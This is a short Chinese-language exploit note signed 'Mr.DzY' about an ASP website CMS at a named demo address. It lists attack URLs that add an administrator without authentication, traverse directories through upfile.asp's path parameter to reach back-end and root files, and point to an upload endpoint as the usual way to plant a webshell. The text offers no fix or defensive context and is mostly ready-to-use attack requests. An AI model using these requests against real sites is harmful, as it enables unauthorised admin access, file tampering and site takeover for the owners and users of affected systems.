演示地址:http://net112.net/test/
添加管理员
http://net112.net/test/admin/admin.asp?action=add&level=2
其实加不加都不是很重要,后台文件都没怎么作验证。通过遍历目录http://net112.net/test/admin/upfile.asp?path=../admin
直接可以操作其他后台文件如友情,版块,文章,留言。。。。
这样可以跳转网站根目录http://net112.net/test/admin/upfile.asp?path=../..
拿webshell一般方法是通过上传
http://net112.net/test/inc/Upfile.asp?UPID=uploadiframe&Stype=0&UID=ps1&SID=photo1&FileName=&imguped=0&imgmax=1&once=1&ImgWith=200&ImgHeight=200
不过貌似服务器对post上传的文件有监控。有兴趣的可以研究下
http://net112.net/test.html
by Mr.DzY
|